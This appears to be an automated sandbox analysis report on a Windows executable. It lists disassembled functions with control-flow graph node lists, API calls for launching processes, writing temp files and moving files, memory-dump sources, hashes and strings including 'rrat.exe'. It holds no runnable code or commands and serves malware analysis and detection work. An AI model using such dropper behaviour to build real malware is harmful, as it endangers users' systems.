                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1281 e92512-e9253e call e905a8 GetDlgItem 1284 e92540-e9256d call e8e4a5 ShowWindow SendMessageW * 2 1281->1284 1285 e92574-e925ae SendMessageW * 2 1281->1285 1284->1285 1287 e925cf-e92600 SendMessageW * 3 1285->1287 1288 e925b0-e925cb 1285->1288 1289 e92602-e9261f SendMessageW 1287->1289 1290 e92625-e9263b SendMessageW 1287->1290 1288->1287 1289->1290
                                                              APIs
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              • GetDlgItem.USER32(00000068,00EE6300), ref: 00E92526
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00E90065,00000001,?,?,00E907F9,00EA9D3C,00EE6300,00EE6300,00001000,00000000,00000000), ref: 00E9254E
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E92559
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E92567
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E9257D
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E92597
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E925DB
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E925E9
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E925F8
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E9261F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8ECC), ref: 00E9262E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 0bd0d118bfe6500bd62e169f040bdc2a38e58acc9e5b61517f8b436e01d60637
                                                              • Instruction ID: 6b6a2401fb982bab0a76f21265838baa29c88567f52ea5fc85ba3a6b80fc4607
                                                              • Opcode Fuzzy Hash: 0bd0d118bfe6500bd62e169f040bdc2a38e58acc9e5b61517f8b436e01d60637
                                                              • Instruction Fuzzy Hash: AA31C1B1145384BFE3019F21DC89FAB3EFCFB46714F000918F655BA292C7655A09CBA6
                                                              Function 00E8F8E2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1292 e8f8e2-e8f8ff FindResourceW 1293 e8f9fb 1292->1293 1294 e8f905-e8f916 SizeofResource 1292->1294 1295 e8f9fd-e8fa01 1293->1295 1294->1293 1296 e8f91c-e8f92b LoadResource 1294->1296 1296->1293 1297 e8f931-e8f93c LockResource 1296->1297 1297->1293 1298 e8f942-e8f957 GlobalAlloc 1297->1298 1299 e8f95d-e8f966 GlobalLock 1298->1299 1300 e8f9f3-e8f9f9 1298->1300 1301 e8f9ec-e8f9ed GlobalFree 1299->1301 1302 e8f96c-e8f98a call e95220 CreateStreamOnHGlobal 1299->1302 1300->1295 1301->1300 1305 e8f98c-e8f9ae call e8f846 1302->1305 1306 e8f9e5-e8f9e6 GlobalUnlock 1302->1306 1305->1306 1311 e8f9b0-e8f9b8 1305->1311 1306->1301 1312 e8f9ba-e8f9ce GdipCreateHBITMAPFromBitmap 1311->1312 1313 e8f9d3-e8f9e1 1311->1313 1312->1313 1314 e8f9d0 1312->1314 1313->1306 1314->1313
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E9077D,00000066), ref: 00E8F8F5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F90C
                                                              • LoadResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F923
                                                              • LockResource.KERNEL32(00000000,?,?,?,00E9077D,00000066), ref: 00E8F932
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00E9077D,00000066), ref: 00E8F94D
                                                              • GlobalLock.KERNEL32(00000000), ref: 00E8F95E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E8F982
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E8F9E6
                                                                • Part of subcall function 00E8F846: GdipAlloc.GDIPLUS(00000010), ref: 00E8F84C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E8F9C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 00E8F9ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: 8f79c6186ad7d96c9810180e2f998a296d908f114ef09b7aa9ac706eff478ada
                                                              • Instruction ID: 65d9f6ba69115b6a4165f602caec7c1edc807e2f12301b2ccdb1680298716be0
                                                              • Opcode Fuzzy Hash: 8f79c6186ad7d96c9810180e2f998a296d908f114ef09b7aa9ac706eff478ada
                                                              • Instruction Fuzzy Hash: B3317272500702AFD711AF62EC98E1B7BA8FF897547115929F80DB2260EF31EC08CB60
                                                              Function 00E927CF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1316 e927cf-e927e7 call e93ac0 1319 e92a28-e92a30 1316->1319 1320 e927ed-e927f9 call e98793 1316->1320 1320->1319 1323 e927ff-e92827 call e94bd0 1320->1323 1326 e92829 1323->1326 1327 e92831-e9283f 1323->1327 1326->1327 1328 e92841-e92844 1327->1328 1329 e92852-e92858 1327->1329 1330 e92848-e9284e 1328->1330 1331 e9289b-e9289e 1329->1331 1333 e92850 1330->1333 1334 e92877-e92884 1330->1334 1331->1330 1332 e928a0-e928a6 1331->1332 1335 e928a8-e928ab 1332->1335 1336 e928ad-e928af 1332->1336 1337 e92862-e9286c 1333->1337 1338 e9288a-e9288e 1334->1338 1339 e92a00-e92a02 1334->1339 1335->1336 1342 e928c2-e928d8 call e8340c 1335->1342 1336->1342 1343 e928b1-e928b8 1336->1343 1344 e9285a-e92860 1337->1344 1345 e9286e 1337->1345 1340 e92894-e92899 1338->1340 1341 e92a06 1338->1341 1339->1341 1340->1331 1350 e92a0f 1341->1350 1351 e928da-e928e7 call e87d24 1342->1351 1352 e928f1-e928fc call e82680 1342->1352 1343->1342 1346 e928ba 1343->1346 1344->1337 1348 e92870-e92873 1344->1348 1345->1334 1346->1342 1348->1334 1353 e92a16-e92a18 1350->1353 1351->1352 1363 e928e9 1351->1363 1361 e92919-e92926 ShellExecuteExW 1352->1361 1362 e928fe-e92915 call e831a3 1352->1362 1354 e92a1a-e92a1c 1353->1354 1355 e92a27 1353->1355 1354->1355 1359 e92a1e-e92a21 ShowWindow 1354->1359 1355->1319 1359->1355 1361->1355 1365 e9292c-e92939 1361->1365 1362->1361 1363->1352 1367 e9293b-e92942 1365->1367 1368 e9294c-e9294e 1365->1368 1367->1368 1369 e92944-e9294a 1367->1369 1370 e92950-e92959 IsWindowVisible 1368->1370 1371 e92965-e92978 WaitForInputIdle call e92c53 1368->1371 1369->1368 1372 e929bb-e929c7 CloseHandle 1369->1372 1370->1371 1373 e9295b-e92963 ShowWindow 1370->1373 1377 e9297d-e92984 1371->1377 1375 e929c9-e929d6 call e87d24 1372->1375 1376 e929d8-e929e6 1372->1376 1373->1371 1375->1350 1375->1376 1376->1353 1379 e929e8-e929ea 1376->1379 1377->1372 1380 e92986-e9298e 1377->1380 1379->1353 1382 e929ec-e929f2 1379->1382 1380->1372 1383 e92990-e929a1 GetExitCodeProcess 1380->1383 1382->1353 1385 e929f4-e929fe 1382->1385 1383->1372 1384 e929a3-e929ad 1383->1384 1386 e929af 1384->1386 1387 e929b4 1384->1387 1385->1353 1386->1387 1387->1372
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E927EE
                                                              • ShellExecuteExW.SHELL32(?), ref: 00E9291E
                                                              • IsWindowVisible.USER32(?), ref: 00E92951
                                                              • ShowWindow.USER32(?,00000000), ref: 00E9295D
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00E9296E
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00E92999
                                                              • CloseHandle.KERNEL32(?), ref: 00E929BF
                                                              • ShowWindow.USER32(?,00000001), ref: 00E92A21
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3646668279-3750412487
                                                              • Opcode ID: e02c40d4cf9ea6fcfb1898fe9660f4462265e2a228440552c6f57b6016bfae75
                                                              • Instruction ID: f007f43d0c8d51266418bf950263c3acc3ec94309a3dd5709fa3d9c05c1c778b
                                                              • Opcode Fuzzy Hash: e02c40d4cf9ea6fcfb1898fe9660f4462265e2a228440552c6f57b6016bfae75
                                                              • Instruction Fuzzy Hash: CF51F731504380BEDF319B21D844AAB77E5AF85748F04281DFAC5B7291D7B1CD49C751
                                                              Function 00E892F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 341COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1388 e892f0-e8932c 1389 e8932e call e8a1aa 1388->1389 1390 e8936f-e89377 1388->1390 1394 e89333-e89335 1389->1394 1392 e8944a 1390->1392 1393 e8937d-e89385 1390->1393 1395 e89450-e89478 call e89dd4 1392->1395 1393->1395 1396 e8938b 1393->1396 1397 e89368-e8936d 1394->1397 1398 e89337-e8934e call e82551 call e8a1aa 1394->1398 1407 e8947a-e8947d 1395->1407 1408 e894e3-e894ec 1395->1408 1400 e8939d-e893b5 call e93db0 1396->1400 1401 e8938d-e89397 1396->1401 1397->1390 1398->1397 1422 e89350-e89363 call e8176e 1398->1422 1400->1395 1409 e893bb 1400->1409 1401->1395 1401->1400 1411 e8947f-e89482 1407->1411 1412 e894b4-e894be call e8acdd 1407->1412 1413 e894ee-e894f4 1408->1413 1414 e893c9-e893cb 1409->1414 1415 e893bd-e893c3 1409->1415 1411->1412 1418 e89484-e8949f call e819eb call e8a5c4 1411->1418 1423 e894c3-e894c5 1412->1423 1419 e894fa-e89516 1413->1419 1420 e893cd 1414->1420 1421 e893fe-e89446 call e82409 1414->1421 1415->1395 1415->1414 1450 e894ac-e894af 1418->1450 1451 e894a1-e894a7 call e89cfd call e8262f 1418->1451 1425 e89518 1419->1425 1426 e89534-e8953f call e8a34d 1419->1426 1431 e893db-e893ec call e81d6a 1420->1431 1432 e893cf-e893d9 1420->1432 1421->1392 1447 e897cf-e897d4 1422->1447 1434 e894cb-e894de 1423->1434 1435 e89605-e89611 call e878d6 1423->1435 1428 e8951a-e8951c 1425->1428 1429 e8951e-e89532 1425->1429 1438 e89545-e89548 1426->1438 1428->1426 1428->1429 1429->1438 1431->1392 1455 e893ee 1431->1455 1432->1421 1432->1431 1434->1435 1456 e89621-e89624 1435->1456 1457 e89613-e8961a 1435->1457 1444 e8954e-e89571 1438->1444 1445 e895f1-e895f3 1438->1445 1444->1419 1452 e89573-e895cf call e87897 call e878d1 call e878d6 1444->1452 1453 e89600 1445->1453 1454 e895f5-e895fb call e8a007 1445->1454 1462 e897cd-e897ce 1450->1462 1451->1450 1522 e895eb 1452->1522 1523 e895d1-e895e6 call e8a007 1452->1523 1453->1435 1454->1453 1464 e893f8 1455->1464 1465 e893f0-e893f6 1455->1465 1458 e89630-e89637 1456->1458 1459 e89626-e8962b call e8181d 1456->1459 1457->1456 1466 e8961c 1457->1466 1468 e8963d-e89658 call e8d7a7 1458->1468 1469 e89722-e8972f 1458->1469 1459->1458 1462->1447 1464->1421 1465->1392 1465->1464 1466->1456 1487 e8965a 1468->1487 1488 e8966e-e8969c call e8a5c4 call e89dd4 1468->1488 1475 e8973c-e8973f 1469->1475 1476 e89731-e89738 1469->1476 1482 e89741-e89744 1475->1482 1483 e89746-e89755 1475->1483 1480 e8973a 1476->1480 1481 e89785-e8978a 1476->1481 1492 e8977c-e89783 1480->1492 1489 e897ab-e897b2 1481->1489 1490 e8978c-e8978e 1481->1490 1482->1483 1484 e89762-e89769 1482->1484 1485 e8975b 1483->1485 1486 e89757-e89759 1483->1486 1496 e89779-e8977b 1484->1496 1497 e8976b-e89772 1484->1497 1495 e8975d call e81663 1485->1495 1486->1495 1498 e8965c-e89662 1487->1498 1499 e89664-e89669 1487->1499 1521 e896a1-e896b3 1488->1521 1493 e897b9-e897be 1489->1493 1494 e897b4 call e89cfd 1489->1494 1501 e897a0-e897a6 call e82409 1490->1501 1502 e89790-e89796 1490->1502 1492->1481 1492->1493 1505 e897c0-e897c1 call e8262f 1493->1505 1506 e897c6-e897cb call e8a5c4 1493->1506 1494->1493 1495->1484 1496->1492 1497->1496 1508 e89774 1497->1508 1498->1488 1498->1499 1499->1488 1501->1489 1502->1501 1510 e89798-e8979e 1502->1510 1505->1506 1506->1462 1508->1496 1510->1489 1510->1501 1524 e896c5-e896df call e8a34d 1521->1524 1525 e896b5 1521->1525 1522->1445 1523->1413 1530 e896e3-e896ea 1524->1530 1526 e896bb-e896c3 1525->1526 1527 e896b7-e896b9 1525->1527 1526->1530 1527->1524 1527->1526 1530->1521 1533 e896ec-e8970e call e95b35 1530->1533 1533->1475 1536 e89710-e89717 1533->1536 1536->1469 1537 e89719-e89720 1536->1537 1537->1469 1537->1476
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E893AA
                                                                • Part of subcall function 00E8A1AA: __EH_prolog.LIBCMT ref: 00E8A1AF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: $D+$D+$D+$rrat.exe
                                                              • API String ID: 3007126557-1803408328
                                                              • Opcode ID: 84fe61d25fb926176d614234df04980c23e5cbcae63f63e74c0cdb6de3dcd8b6
                                                              • Instruction ID: 320c21e7d813638630d68e71be27cc52df95f3652c94209edd42bc46525eaef5
                                                              • Opcode Fuzzy Hash: 84fe61d25fb926176d614234df04980c23e5cbcae63f63e74c0cdb6de3dcd8b6
                                                              • Instruction Fuzzy Hash: 60D1A37090D340CFD725BF26AC85A7A3BA1E74531CF18213AE85DB72A3E772584ACB51
                                                              Function 00E91EC5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1538 e91ec5-e91ec8 1539 e91ece-e91ef3 GetTempPathW call e8316f 1538->1539 1540 e92047-e9204a 1538->1540 1548 e91ef7-e91f23 call e839a9 call e82680 1539->1548 1542 e92050-e92056 1540->1542 1543 e92417-e92442 call e90354 1540->1543 1545 e92058 1542->1545 1546 e92062-e92069 1542->1546 1551 e92448-e92456 1543->1551 1552 e917d1-e917df 1543->1552 1545->1546 1546->1543 1561 e91ef5-e91ef6 1548->1561 1562 e91f25-e91f3c SetDlgItemTextW 1548->1562 1553 e917e0-e917f5 call e900f6 1552->1553 1560 e917f7 1553->1560 1563 e917f9-e9180e call e87d24 1560->1563 1561->1548 1562->1543 1564 e91f42-e91f48 1562->1564 1569 e9181b-e9181e 1563->1569 1570 e91810-e91814 1563->1570 1564->1543 1566 e91f4e-e91f69 call e950e0 1564->1566 1572 e91fb9-e91fc0 1566->1572 1573 e91f6b-e91f77 1566->1573 1569->1543 1575 e91824 1569->1575 1570->1563 1574 e91816 1570->1574 1577 e91ff2-e92022 call e8ff30 call e8fa04 1572->1577 1578 e91fc2-e91fed call e868cd * 2 1572->1578 1573->1572 1576 e91f79 1573->1576 1574->1543 1579 e9182b-e9182e 1575->1579 1580 e91aba-e91abc 1575->1580 1581 e91a9d-e91a9f 1575->1581 1582 e919fc-e919fe 1575->1582 1583 e91f7c-e91f80 1576->1583 1577->1543 1616 e92028-e92042 EndDialog 1577->1616 1578->1577 1579->1543 1588 e91834-e9188e call e8f86d call e83793 call e829a2 call e82adc call e81ac3 1579->1588 1580->1543 1585 e91ac2-e91ac9 1580->1585 1581->1543 1584 e91aa5-e91ab5 SetWindowTextW 1581->1584 1582->1543 1587 e91a04-e91a10 1582->1587 1590 e91f82-e91f90 1583->1590 1591 e91f94-e91fb1 call e868cd 1583->1591 1584->1543 1585->1543 1592 e91acf-e91ae8 1585->1592 1594 e91a12-e91a23 call e9c007 1587->1594 1595 e91a24-e91a29 1587->1595 1655 e919cd-e919e2 call e82a2f 1588->1655 1590->1583 1599 e91f92 1590->1599 1591->1572 1601 e91aea 1592->1601 1602 e91af0-e91afe call e98793 1592->1602 1594->1595 1606 e91a2b-e91a31 1595->1606 1607 e91a33-e91a3e call e904ce 1595->1607 1599->1572 1601->1602 1602->1543 1624 e91b04-e91b0d 1602->1624 1608 e91a43-e91a45 1606->1608 1607->1608 1618 e91a50-e91a70 call e98793 call e9aa36 1608->1618 1619 e91a47-e91a4e call e98793 1608->1619 1616->1543 1644 e91a89-e91a8b 1618->1644 1645 e91a72-e91a79 1618->1645 1619->1618 1628 e91b0f-e91b13 1624->1628 1629 e91b36-e91b39 1624->1629 1630 e91b3f-e91b42 1628->1630 1631 e91b15-e91b1d 1628->1631 1629->1630 1633 e91c1e-e91c2c call e868cd 1629->1633 1638 e91b4f-e91b6a 1630->1638 1639 e91b44-e91b49 1630->1639 1631->1543 1636 e91b23-e91b31 call e868cd 1631->1636 1646 e91c2e-e91c42 call e958cb 1633->1646 1636->1646 1656 e91b6c-e91ba6 1638->1656 1657 e91bb4-e91bbb 1638->1657 1639->1633 1639->1638 1644->1543 1647 e91a91-e91a98 call e987ae 1644->1647 1651 e91a7b-e91a7d 1645->1651 1652 e91a80-e91a88 call e9c007 1645->1652 1666 e91c4f-e91ca0 call e868cd call e901f1 GetDlgItem SetWindowTextW SendMessageW call e9a890 1646->1666 1667 e91c44-e91c48 1646->1667 1647->1543 1651->1652 1652->1644 1673 e919e8-e919f7 call e829b8 1655->1673 1674 e91893-e918a7 SetFileAttributesW 1655->1674 1690 e91ba8 1656->1690 1691 e91baa-e91bac 1656->1691 1660 e91be9-e91c0c call e98793 * 2 1657->1660 1661 e91bbd-e91bd5 call e98793 1657->1661 1660->1646 1695 e91c0e-e91c1c call e868a5 1660->1695 1661->1660 1677 e91bd7-e91be4 call e868a5 1661->1677 1701 e91ca5-e91ca9 1666->1701 1667->1666 1672 e91c4a-e91c4c 1667->1672 1672->1666 1673->1543 1679 e9194d-e9195d GetFileAttributesW 1674->1679 1680 e918ad-e918e0 call e83470 call e8316f call e98793 1674->1680 1677->1660 1679->1655 1688 e9195f-e9196e DeleteFileW 1679->1688 1711 e918f3-e91901 call e83754 1680->1711 1712 e918e2-e918f1 call e98793 1680->1712 1688->1655 1694 e91970-e91973 1688->1694 1690->1691 1691->1657 1698 e91977-e919a3 call e839a9 GetFileAttributesW 1694->1698 1695->1646 1707 e91975-e91976 1698->1707 1708 e919a5-e919bb MoveFileW 1698->1708 1701->1543 1706 e91caf-e91cc3 SendMessageW 1701->1706 1706->1543 1707->1698 1708->1655 1710 e919bd-e919c7 MoveFileExW 1708->1710 1710->1655 1711->1673 1717 e91907-e91947 call e98793 call e94bd0 SHFileOperationW 1711->1717 1712->1711 1712->1717 1717->1679
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00E91EDB
                                                                • Part of subcall function 00E8316F: _wcslen.LIBCMT ref: 00E83175
                                                              • _swprintf.LIBCMT ref: 00E91F0F
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(?,00000066,00ECFA3A), ref: 00E91F2F
                                                              • _wcschr.LIBVCRUNTIME ref: 00E91F60
                                                              • EndDialog.USER32(?,00000001), ref: 00E9203C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 689974011-1360425832
                                                              • Opcode ID: 33263517fb3b739883f57be8f76d76a0a7666035e47494d5f170e8bd2fb7f866
                                                              • Instruction ID: 9fe2d5c458dc902ba441550133ce6bfd0b7233d54e3dcabe222c09c409ff2145
                                                              • Opcode Fuzzy Hash: 33263517fb3b739883f57be8f76d76a0a7666035e47494d5f170e8bd2fb7f866
                                                              • Instruction Fuzzy Hash: FE416D71900259AEDF25ABA1CC85EEA77ECEB04704F4090A6FA0DB7151EF708A49CF61
                                                              Function 00E9F2E4 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1722 e9f2e4-e9f2fd 1723 e9f2ff-e9f30f call ea38cc 1722->1723 1724 e9f313-e9f318 1722->1724 1723->1724 1732 e9f311 1723->1732 1726 e9f31a-e9f322 1724->1726 1727 e9f325-e9f349 MultiByteToWideChar 1724->1727 1726->1727 1729 e9f4dc-e9f4ef call e9494c 1727->1729 1730 e9f34f-e9f35b 1727->1730 1733 e9f35d-e9f36e 1730->1733 1734 e9f3af 1730->1734 1732->1724 1735 e9f38d-e9f39e call e9da90 1733->1735 1736 e9f370-e9f37f call ea69a0 1733->1736 1738 e9f3b1-e9f3b3 1734->1738 1742 e9f4d1 1735->1742 1748 e9f3a4 1735->1748 1736->1742 1747 e9f385-e9f38b 1736->1747 1741 e9f3b9-e9f3cc MultiByteToWideChar 1738->1741 1738->1742 1741->1742 1745 e9f3d2-e9f3e4 call e9f8ec 1741->1745 1746 e9f4d3-e9f4da call e9f54c 1742->1746 1752 e9f3e9-e9f3ed 1745->1752 1746->1729 1751 e9f3aa-e9f3ad 1747->1751 1748->1751 1751->1738 1752->1742 1754 e9f3f3-e9f3fa 1752->1754 1755 e9f3fc-e9f401 1754->1755 1756 e9f434-e9f440 1754->1756 1755->1746 1757 e9f407-e9f409 1755->1757 1758 e9f48c 1756->1758 1759 e9f442-e9f453 1756->1759 1757->1742 1760 e9f40f-e9f429 call e9f8ec 1757->1760 1761 e9f48e-e9f490 1758->1761 1762 e9f46e-e9f47f call e9da90 1759->1762 1763 e9f455-e9f464 call ea69a0 1759->1763 1760->1746 1774 e9f42f 1760->1774 1765 e9f4ca-e9f4d0 call e9f54c 1761->1765 1766 e9f492-e9f4ab call e9f8ec 1761->1766 1762->1765 1778 e9f481 1762->1778 1763->1765 1777 e9f466-e9f46c 1763->1777 1765->1742 1766->1765 1780 e9f4ad-e9f4b4 1766->1780 1774->1742 1779 e9f487-e9f48a 1777->1779 1778->1779 1779->1761 1781 e9f4f0-e9f4f6 1780->1781 1782 e9f4b6-e9f4b7 1780->1782 1783 e9f4b8-e9f4c8 WideCharToMultiByte 1781->1783 1782->1783 1783->1765 1784 e9f4f8-e9f4ff call e9f54c 1783->1784 1784->1746
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E9A093,00E9A093,?,?,?,00E9F535,00000001,00000001,6AE85006), ref: 00E9F33E
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E9F535,00000001,00000001,6AE85006,?,?,?), ref: 00E9F3C4
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,6AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E9F4BE
                                                              • __freea.LIBCMT ref: 00E9F4CB
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • __freea.LIBCMT ref: 00E9F4D4
                                                              • __freea.LIBCMT ref: 00E9F4F9
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
